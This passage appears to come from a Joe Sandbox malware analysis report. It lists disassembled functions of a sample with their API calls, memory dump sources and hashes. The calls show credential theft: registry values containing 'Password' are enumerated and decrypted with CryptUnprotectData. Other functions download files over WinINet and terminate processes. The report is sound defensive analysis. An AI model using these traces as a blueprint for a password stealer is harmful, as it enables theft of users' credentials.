                                • lstrcat.KERNEL32(?,010CED38), ref: 009CE00D
                                • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 009CE037
                                • lstrcpy.KERNEL32(00000000,?), ref: 009CE06F
                                • lstrcat.KERNEL32(?,00000000), ref: 009CE07D
                                • lstrcat.KERNEL32(?,?), ref: 009CE098
                                • lstrcat.KERNEL32(?,?), ref: 009CE0AC
                                • lstrcat.KERNEL32(?,010BA8C0), ref: 009CE0C0
                                • lstrcat.KERNEL32(?,?), ref: 009CE0D4
                                • lstrcat.KERNEL32(?,010CDAF0), ref: 009CE0E7
                                • lstrcpy.KERNEL32(00000000,?), ref: 009CE11F
                                • GetFileAttributesA.KERNEL32(00000000), ref: 009CE126
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$lstrcpy$AttributesFileFolderPath
                                • String ID:
                                • API String ID: 4230089145-0
                                • Opcode ID: e665da5100e94ab62e71cc70382173ee265e8a723481af6bb1486a77771d763f
                                • Instruction ID: 4003f103f3f2828de8863fae16b8e3d288c9a5e223a02c9a1a71e4cf014e90ac
                                • Opcode Fuzzy Hash: e665da5100e94ab62e71cc70382173ee265e8a723481af6bb1486a77771d763f
                                • Instruction Fuzzy Hash: 35619B71D1011CABCB65DF64CD84BDDB7B8BF88310F5049A8A60AA7291DF70AF858F90
                                Function 009B6AD0 Relevance: 16.6, APIs: 11, Instructions: 127networkfilestringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,?), ref: 009B6AFF
                                • InternetOpenA.WININET(009DCFEC,00000001,00000000,00000000,00000000), ref: 009B6B2C
                                • StrCmpCA.SHLWAPI(?,010CF498), ref: 009B6B4A
                                • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,-00800100,00000000), ref: 009B6B6A
                                • CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 009B6B88
                                • InternetReadFile.WININET(00000000,?,00000400,?), ref: 009B6BA1
                                • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 009B6BC6
                                • InternetReadFile.WININET(00000000,?,00000400,?), ref: 009B6BF0
                                • CloseHandle.KERNEL32(00000000), ref: 009B6C10
                                • InternetCloseHandle.WININET(00000000), ref: 009B6C17
                                • InternetCloseHandle.WININET(?), ref: 009B6C21
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$File$CloseHandle$OpenRead$CreateWritelstrcpy
                                • String ID:
                                • API String ID: 2500263513-0
                                • Opcode ID: 5d453167fe3700ea86f7c65856dba7bb0a182c9fb6a8931e4436b66c69d64544
                                • Instruction ID: b2053a2f224b00b12e230fe9935f0585b0ec1ff32fe5e22a9e85c66346e68b05
                                • Opcode Fuzzy Hash: 5d453167fe3700ea86f7c65856dba7bb0a182c9fb6a8931e4436b66c69d64544
                                • Instruction Fuzzy Hash: 35418E71A00215ABDB20DF64DD85FEE77BCEB44711F104864FA09EB280EF74AE448BA4
                                Function 009BBBF9 Relevance: 15.2, APIs: 12, Instructions: 249stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009BBC1F
                                • lstrlen.KERNEL32(00000000), ref: 009BBC52
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009BBC7C
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009BBC84
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009BBCAC
                                • lstrlen.KERNEL32(009E4AD4), ref: 009BBD23
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$lstrcat
                                • String ID:
                                • API String ID: 2500673778-0
                                • Opcode ID: 3dd96479e7784b0673eee8613a3e20f8b8dcafe0ca0933829d0d8a421f95d816
                                • Instruction ID: 1e9d110d4b29212653a0abe5ceee69f74d8d6ed4672aaf3974fc18e4b11ecd17
                                • Opcode Fuzzy Hash: 3dd96479e7784b0673eee8613a3e20f8b8dcafe0ca0933829d0d8a421f95d816
                                • Instruction Fuzzy Hash: 1DA150706012058FCB25DF68DB89BEEB7B4EF84325F198069E409AB2E1DB75DC41CB51
                                Function 009D5EE0 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 215COMMON
                                Download Yara Rule
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 009D5F2A
                                • std::_Xinvalid_argument.LIBCPMT ref: 009D5F49
                                • memmove.MSVCRT(00000000,00000000,FFFFFFFF,?,?,00000000), ref: 009D6014
                                • memmove.MSVCRT(00000000,00000000,?), ref: 009D609F
                                • std::_Xinvalid_argument.LIBCPMT ref: 009D60D0
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Xinvalid_argumentstd::_$memmove
                                • String ID: invalid string position$string too long
                                • API String ID: 1975243496-4289949731
                                • Opcode ID: fe59dd4edf562330a8aad28bf4c9a4070fa5af12cdfb863d0b2aaf7e7a4d4622
                                • Instruction ID: 40b4371152cc5df8f286703739e969dbee143d480d6836372c5ed8a0746874b9
                                • Opcode Fuzzy Hash: fe59dd4edf562330a8aad28bf4c9a4070fa5af12cdfb863d0b2aaf7e7a4d4622
                                • Instruction Fuzzy Hash: 1D61AD70740505DBDB28CF5DCDD4A6EB7B6EF84304B298A1AE4928B781C731ED80CB94
                                Function 009D4500 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 95memoryCOMMON
                                Download Yara Rule
                                APIs
                                • memset.MSVCRT ref: 009D451A
                                • GetProcessHeap.KERNEL32(00000000,000000FA,00000000,?,?,?,009C4F39), ref: 009D4545
                                • RtlAllocateHeap.NTDLL(00000000), ref: 009D454C
                                • wsprintfW.USER32 ref: 009D455B
                                • OpenProcess.KERNEL32(00001001,00000000,?,?), ref: 009D45CA
                                • TerminateProcess.KERNEL32(00000000,00000000,?,?), ref: 009D45D9
                                • CloseHandle.KERNEL32(00000000,?,?), ref: 009D45E0
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                                • String ID: %hs
                                • API String ID: 3729781310-2783943728
                                • Opcode ID: 11e1db364d5c3892d3357e0753d00d9a5ed4b94082c18a65a2f68b96378de264
                                • Instruction ID: 3b5fd4063015e6521fcdb1ef5a27a4c9d98127c501f5d92bcb37fa3c9c9d56b5
                                • Opcode Fuzzy Hash: 11e1db364d5c3892d3357e0753d00d9a5ed4b94082c18a65a2f68b96378de264
                                • Instruction Fuzzy Hash: B6315E72A40245BBDB20DBE4EC85FDEB77CAF44700F104555FA09AB280EF70AA458BA5
                                Function 009CE049 Relevance: 13.6, APIs: 9, Instructions: 124stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,?), ref: 009CE06F
                                • lstrcat.KERNEL32(?,00000000), ref: 009CE07D
                                • lstrcat.KERNEL32(?,?), ref: 009CE098
                                • lstrcat.KERNEL32(?,?), ref: 009CE0AC
                                • lstrcat.KERNEL32(?,010BA8C0), ref: 009CE0C0
                                • lstrcat.KERNEL32(?,?), ref: 009CE0D4
                                • lstrcat.KERNEL32(?,010CDAF0), ref: 009CE0E7
                                • lstrcpy.KERNEL32(00000000,?), ref: 009CE11F
                                • GetFileAttributesA.KERNEL32(00000000), ref: 009CE126
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$lstrcpy$AttributesFile
                                • String ID:
                                • API String ID: 3428472996-0
                                • Opcode ID: 534f2adc497f8f660e9c81c9c0a1987463f7c0584abab9157f4b16e78e3b320e
                                • Instruction ID: a3d81def13dbb1847cc56227656dc0de694b5ff16056836e72efe2b80434e46b
                                • Opcode Fuzzy Hash: 534f2adc497f8f660e9c81c9c0a1987463f7c0584abab9157f4b16e78e3b320e
                                • Instruction Fuzzy Hash: D6417A71D101189BCB25EF64DE88BDD73B8FF88310F5449A8B90AA7251DF309F858B91
                                Function 009B7A60 Relevance: 13.6, APIs: 8, Strings: 1, Instructions: 109stringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 009B77D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 009B7805
                                  • Part of subcall function 009B77D0: RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 009B784A
                                  • Part of subcall function 009B77D0: StrStrA.SHLWAPI(?,Password), ref: 009B78B8
                                  • Part of subcall function 009B77D0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 009B78EC
                                  • Part of subcall function 009B77D0: HeapFree.KERNEL32(00000000), ref: 009B78F3
                                • lstrcat.KERNEL32(00000000,009E4AD4), ref: 009B7A90
                                • lstrcat.KERNEL32(00000000,?), ref: 009B7ABD
                                • lstrcat.KERNEL32(00000000, : ), ref: 009B7ACF
                                • lstrcat.KERNEL32(00000000,?), ref: 009B7AF0
                                • wsprintfA.USER32 ref: 009B7B10
                                • lstrcpy.KERNEL32(00000000,?), ref: 009B7B39
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009B7B47
                                • lstrcat.KERNEL32(00000000,009E4AD4), ref: 009B7B60
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$Heap$EnumFreeOpenProcessValuelstrcpywsprintf
                                • String ID: :
                                • API String ID: 398153587-3653984579
                                • Opcode ID: 58e89171c279924a35aa62c39d07504605e642fecd3ba6024ba3377d13347f44
                                • Instruction ID: 35bc3af662a21b99d867f7c1e34c1b1f3b288fa23b9375e5d589c6b88a859f71
                                • Opcode Fuzzy Hash: 58e89171c279924a35aa62c39d07504605e642fecd3ba6024ba3377d13347f44
                                • Instruction Fuzzy Hash: FD31B272A00254AFCB11DBE8DE84AEFF779EBC4724B140619E50AA7200DF70ED05DBA0
                                Function 009C81B0 Relevance: 12.7, APIs: 10, Instructions: 175stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlen.KERNEL32(00000000), ref: 009C820C
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C8243
                                • lstrlen.KERNEL32(00000000), ref: 009C8260
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C8297
                                • lstrlen.KERNEL32(00000000), ref: 009C82B4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C82EB
                                • lstrlen.KERNEL32(00000000), ref: 009C8308
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C8337
                                • lstrlen.KERNEL32(00000000), ref: 009C8351
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C8380
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpylstrlen
                                • String ID:
                                • API String ID: 2001356338-0
                                • Opcode ID: 028d5782cf6b75397813971024daebe6a09e7704ff527814b8f5e2608ec1349d
                                • Instruction ID: ea22b3b04d6a670d0e5351ed136b8ce1abc7e3ee3aa28e7924217a0e720e94c2
                                • Opcode Fuzzy Hash: 028d5782cf6b75397813971024daebe6a09e7704ff527814b8f5e2608ec1349d
                                • Instruction Fuzzy Hash: 2A517E719006029BEB14DF68DA98BABB7A8EF44750F114918ED06EB244EF34ED50CBE1
                                Function 009B77D0 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 208registrymemoryCOMMON
                                Download Yara Rule
                                APIs
                                • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 009B7805
                                • RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 009B784A
                                • StrStrA.SHLWAPI(?,Password), ref: 009B78B8
                                  • Part of subcall function 009B7750: GetProcessHeap.KERNEL32(00000008,00000400), ref: 009B775E
                                  • Part of subcall function 009B7750: RtlAllocateHeap.NTDLL(00000000), ref: 009B7765
                                  • Part of subcall function 009B7750: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 009B778D
                                  • Part of subcall function 009B7750: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 009B77AD
                                  • Part of subcall function 009B7750: LocalFree.KERNEL32(?), ref: 009B77B7
                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 009B78EC
                                • HeapFree.KERNEL32(00000000), ref: 009B78F3
                                • RegEnumValueA.ADVAPI32(80000001,00000000,?,000000FF,00000000,00000003,?,?,80000001), ref: 009B7A35
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
